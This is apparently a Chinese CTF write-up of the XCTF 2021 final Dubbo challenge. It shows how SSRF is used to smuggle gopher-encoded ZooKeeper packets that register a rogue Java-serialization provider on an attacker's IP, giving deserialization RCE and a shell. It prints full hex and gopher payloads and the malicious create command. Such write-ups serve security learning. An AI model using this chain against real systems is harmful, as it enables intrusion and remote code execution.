XCTF-final-dubbo
XCTF-dubbo
首先要知道dubbo是什么:
https://dubbo.apache.org/zh/docs/introduction/
dubbo的官方解释
节点角色说明:
Provider: 暴露服务的服务提供方。
Consumer: 调用远程服务的服务消费方。
Registry: 服务注册与发现的注册中心。
Monitor: 统计服务的调用次调和调用时间的监控中心。
Container: 服务运行容器。
调用关系说明:
0 服务容器负责启动,加载,运行服务提供者。
1 服务提供者在启动时,向注册中心注册自己提供的服务。
2 服务消费者在启动时,向注册中心订阅自己所需的服务。
3 注册中心返回服务提供者地址列表给消费者,如果有变更,注册中心将基于长连接推送变更数据给消费者。
4 服务消费者,从提供者地址列表中,基于软负载均衡算法,选一台提供者进行调用,如果调用失败,再选另一台调用。
5 服务消费者和提供者,在内存中累计调用次数和调用时间,定时每分钟发送一次统计数据到监控中心。
攻击zookeeper
当我们简单了解了dubbo和zookeeper时,我们尝试本地搭建环境。
首先下载zookeeper,然后源码启动Provider和Consumer。
在zookeeper通信的时候抓包
socat -v -x tcp-listen:9992,fork tcp-connect:127.0.0.1:2181
这里监听9992端口,然后把流量发到2181到zookeeper里。那么我们就用cli连9992端口,那么就可以把流量转到2181的zookeeper服务里。中间经过socat抓到了流量。
那么我们就可以把流量改成gopher包来发送数据。
可以看到from 0 to 48是每次连接zookeeper都要使用的包,因此每次攻击必须放在前面。
因为kali里没有启动dubbo服务,用windows启动服务。然后转发流量抓包
红框标注的就是ls /的流量
socat -v -v -x tcp-listen:9990,fork tcp-connect:192.168.75.1:2181
zkCli.cmd -server 192.168.75.137:9990
这样可以清楚的看到zookeeper·里的结构。
发现在/dubbo/dubbo.service.DemoService/providers/
下有
dubbo%3A%2F%2F169.254.102.52%3A20880%2Fdubbo.service.DemoService%3Fanyhost%3Dtrue%26application%3Ddubbo-provider%26deprecated%3Dfalse%26dubbo%3D2.0.2%26dynamic%3Dtrue%26generic%3Dfalse%26interface%3Ddubbo.service.DemoService%26metadata-type%3Dremote%26methods%3DsayHello%26pid%3D40620%26release%3D2.7.8%26revision%3D1.0.0%26side%3Dprovider%26timestamp%3D1634887913064%26version%3D1.0.0
解码一下就是
dubbo://169.254.102.52:20880/dubbo.service.DemoService?anyhost=true&application=dubbo-provider&deprecated=false&dubbo=2.0.2&dynamic=true&generic=false&interface=dubbo.service.DemoService&metadata-type=remote&methods=sayHello&pid=40620&release=2.7.8&revision=1.0.0&side=provider×tamp=1634887913064&version=1.0.0
因为是本地所以这里协议地址就是169,内网ip没获取到
根据https://xz.aliyun.com/t/7354,只要让他java反序列化就行了。最后用gopher将流量打进去。
我们根据这篇文章改一下这个目录。
改完之后是
dubbo://139.199.203.253:20890/dubbo.service.DemoService?anyhost=true&application=dubbo-provider&bean.name=ServiceBean:dubbo.service.DemoService:1.0.0&deprecated=false&dubbo=2.0.2&dynamic=true&generic=false&interface=dubbo.service.DemoService&methods=sayHello&pid=41643®ister=true&release=2.7.3&revision=1.0.0&side=provider&serialization=java×tamp=1605961792779&version=1.0.0 139.199.203.253
这里主要修改的就是serialization=java
那么我们要创建这个目录,命令就是
create /dubbo/dubbo.service.DemoService/providers/dubbo%3A%2F%2F139.199.203.253%3A20890%2Fdubbo.service.DemoService%3Fanyhost%3Dtrue%26application%3Ddubbo-provider%26bean.name%3DServiceBean%3Adubbo.service.DemoService%3A1.0.0%26deprecated%3Dfalse%26dubbo%3D2.0.2%26dynamic%3Dtrue%26generic%3Dfalse%26interface%3Ddubbo.service.DemoService%26methods%3DsayHello%26pid%3D41643%26register%3Dtrue%26release%3D2.7.3%26revision%3D1.0.0%26side%3Dprovider%26serialization%3djava%26timestamp%3D1605961792779%26version%3D1.0.0 139.199.203.253
那我们先在shell里模拟一下,然后转换成gopher形式。尝试用curl打一下看看会不会生成。这里转换gopher推荐使用cyberchef
然后二次编码,加上gopher头就可以了。
所以下面就是抓流量=>改成gopher协议的过程。
先发送登录流量,再发送create流量,伪造一个我们的恶意消费者。
我这里先create一个恶意的服务器,然后捕获这部分流量,转换成gopher
然后把刚才登录zookeeper的那部分gopher拼接到前面
我先把这个东西删掉。现在打一下gopher(本地起一个ssrf的点)
打入流量发现已经有新的东西生成了。这个就是我们的恶意provider。之后ip改一下即可。
攻击consume
然后准备好我们的javaexp
javaexp编写只需要照着这个,fuzz一下gadget链就行
https://github.com/threedr3am/learnjavabug/tree/master/dubbo/src/main/java/com/threedr3am/bug/dubbo
https://github.com/LFYSec/XCTF2021Final-Dubbo
如果我们可以控制provider的返回数据,那这里就存在一个java反序列化漏洞。
打包好以后放到服务器上运行,作为恶意provider服务器。
然后把上面的ip改成我们服务器的ip。将数据打入zookeeper。
此时zookeeper已经有正确的地址和恶意的地址,因为有负载均衡,所以consume会随机选择一个provider连接。当连接到恶意的provider时,反序列化触发。
那么只要我们这里有一次输出就会执行一次命令。成功复现。
打远程
然后我们就是打远程。首先抓流量,先抓取连接流量
红框标注的是连接流量,我们用上面的方式转换为gopher流量。
%00%00%00%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%75%30%00%00%00%00%00%00%00%00%00%00%00%10%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
然后我们模拟插入恶意provider。
create /dubbo/dubbo.service.DemoService/providers/dubbo%3A%2F%2F47.97.123.81%3A20890%2Fdubbo.service.DemoService%3Fanyhost%3Dtrue%26application%3Ddubbo-provider%26bean.name%3DServiceBean%3Adubbo.service.DemoService%3A1.0.0%26deprecated%3Dfalse%26dubbo%3D2.0.2%26dynamic%3Dtrue%26generic%3Dfalse%26interface%3Ddubbo.service.DemoService%26methods%3DsayHello%26pid%3D41643%26register%3Dtrue%26release%3D2.7.3%26revision%3D1.0.0%26side%3Dprovider%26serialization%3djava%26timestamp%3D1605961792779%26version%3D1.0.0
截取流量包,转换成gopher
%00%00%02%27%00%00%00%02%00%00%00%01%00%00%01%f8%2f%64%75%62%62%6f%2f%64%75%62%62%6f%2e%73%65%72%76%69%63%65%2e%44%65%6d%6f%53%65%72%76%69%63%65%2f%70%72%6f%76%69%64%65%72%73%2f%64%75%62%62%6f%25%33%41%25%32%46%25%32%46%34%37%2e%39%37%2e%31%32%33%2e%38%31%25%33%41%32%30%38%39%30%25%32%46%64%75%62%62%6f%2e%73%65%72%76%69%63%65%2e%44%65%6d%6f%53%65%72%76%69%63%65%25%33%46%61%6e%79%68%6f%73%74%25%33%44%74%72%75%65%25%32%36%61%70%70%6c%69%63%61%74%69%6f%6e%25%33%44%64%75%62%62%6f%2d%70%72%6f%76%69%64%65%72%25%32%36%62%65%61%6e%2e%6e%61%6d%65%25%33%44%53%65%72%76%69%63%65%42%65%61%6e%25%33%41%64%75%62%62%6f%2e%73%65%72%76%69%63%65%2e%44%65%6d%6f%53%65%72%76%69%63%65%25%33%41%31%2e%30%2e%30%25%32%36%64%65%70%72%65%63%61%74%65%64%25%33%44%66%61%6c%73%65%25%32%36%64%75%62%62%6f%25%33%44%32%2e%30%2e%32%25%32%36%64%79%6e%61%6d%69%63%25%33%44%74%72%75%65%25%32%36%67%65%6e%65%72%69%63%25%33%44%66%61%6c%73%65%25%32%36%69%6e%74%65%72%66%61%63%65%25%33%44%64%75%62%62%6f%2e%73%65%72%76%69%63%65%2e%44%65%6d%6f%53%65%72%76%69%63%65%25%32%36%6d%65%74%68%6f%64%73%25%33%44%73%61%79%48%65%6c%6c%6f%25%32%36%70%69%64%25%33%44%34%31%36%34%33%25%32%36%72%65%67%69%73%74%65%72%25%33%44%74%72%75%65%25%32%36%72%65%6c%65%61%73%65%25%33%44%32%2e%37%2e%33%25%32%36%72%65%76%69%73%69%6f%6e%25%33%44%31%2e%30%2e%30%25%32%36%73%69%64%65%25%33%44%70%72%6f%76%69%64%65%72%25%32%36%73%65%72%69%61%6c%69%7a%61%74%69%6f%6e%25%33%64%6a%61%76%61%25%32%36%74%69%6d%65%73%74%61%6d%70%25%33%44%31%36%30%35%39%36%31%37%39%32%37%37%39%25%32%36%76%65%72%73%69%6f%6e%25%33%44%31%2e%30%2e%30%ff%ff%ff%ff%00%00%00%01%00%00%00%1f%00%00%00%05%77%6f%72%6c%64%00%00%00%06%61%6e%79%6f%6e%65%00%00%00%00
然后把两部分拼接到一起,套上gopher打一下本地。成功插入
http://localhost/?url=gopher://192.168.75.137:9991/_%2500%2500%2500%252d%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2575%2530%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2510%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2502%2527%2500%2500%2500%2502%2500%2500%2500%2501%2500%2500%2501%25f8%252f%2564%2575%2562%2562%256f%252f%2564%2575%2562%2562%256f%252e%2573%2565%2572%2576%2569%2563%2565%252e%2544%2565%256d%256f%2553%2565%2572%2576%2569%2563%2565%252f%2570%2572%256f%2576%2569%2564%2565%2572%2573%252f%2564%2575%2562%2562%256f%2525%2533%2541%2525%2532%2546%2525%2532%2546%2534%2537%252e%2539%2537%252e%2531%2532%2533%252e%2538%2531%2525%2533%2541%2532%2530%2538%2539%2530%2525%2532%2546%2564%2575%2562%2562%256f%252e%2573%2565%2572%2576%2569%2563%2565%252e%2544%2565%256d%256f%2553%2565%2572%2576%2569%2563%2565%2525%2533%2546%2561%256e%2579%2568%256f%2573%2574%2525%2533%2544%2574%2572%2575%2565%2525%2532%2536%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%2525%2533%2544%2564%2575%2562%2562%256f%252d%2570%2572%256f%2576%2569%2564%2565%2572%2525%2532%2536%2562%2565%2561%256e%252e%256e%2561%256d%2565%2525%2533%2544%2553%2565%2572%2576%2569%2563%2565%2542%2565%2561%256e%2525%2533%2541%2564%2575%2562%2562%256f%252e%2573%2565%2572%2576%2569%2563%2565%252e%2544%2565%256d%256f%2553%2565%2572%2576%2569%2563%2565%2525%2533%2541%2531%252e%2530%252e%2530%2525%2532%2536%2564%2565%2570%2572%2565%2563%2561%2574%2565%2564%2525%2533%2544%2566%2561%256c%2573%2565%2525%2532%2536%2564%2575%2562%2562%256f%2525%2533%2544%2532%252e%2530%252e%2532%2525%2532%2536%2564%2579%256e%2561%256d%2569%2563%2525%2533%2544%2574%2572%2575%2565%2525%2532%2536%2567%2565%256e%2565%2572%2569%2563%2525%2533%2544%2566%2561%256c%2573%2565%2525%2532%2536%2569%256e%2574%2565%2572%2566%2561%2563%2565%2525%2533%2544%2564%2575%2562%2562%256f%252e%2573%2565%2572%2576%2569%2563%2565%252e%2544%2565%256d%256f%2553%2565%2572%2576%2569%2563%2565%2525%2532%2536%256d%2565%2574%2568%256f%2564%2573%2525%2533%2544%2573%2561%2579%2548%2565%256c%256c%256f%2525%2532%2536%2570%2569%2564%2525%2533%2544%2534%2531%2536%2534%2533%2525%2532%2536%2572%2565%2567%2569%2573%2574%2565%2572%2525%2533%2544%2574%2572%2575%2565%2525%2532%2536%2572%2565%256c%2565%2561%2573%2565%2525%2533%2544%2532%252e%2537%252e%2533%2525%2532%2536%2572%2565%2576%2569%2573%2569%256f%256e%2525%2533%2544%2531%252e%2530%252e%2530%2525%2532%2536%2573%2569%2564%2565%2525%2533%2544%2570%2572%256f%2576%2569%2564%2565%2572%2525%2532%2536%2573%2565%2572%2569%2561%256c%2569%257a%2561%2574%2569%256f%256e%2525%2533%2564%256a%2561%2576%2561%2525%2532%2536%2574%2569%256d%2565%2573%2574%2561%256d%2570%2525%2533%2544%2531%2536%2530%2535%2539%2536%2531%2537%2539%2532%2537%2537%2539%2525%2532%2536%2576%2565%2572%2573%2569%256f%256e%2525%2533%2544%2531%252e%2530%252e%2530%25ff%25ff%25ff%25ff%2500%2500%2500%2501%2500%2500%2500%251f%2500%2500%2500%2505%2577%256f%2572%256c%2564%2500%2500%2500%2506%2561%256e%2579%256f%256e%2565%2500%2500%2500%2500
然后就可以打远程服务器。
上传java exp到vps上
远程有点问题,本地能打进数据,远程就是不行。(可能环境有问题?)
手动create一下弹到shell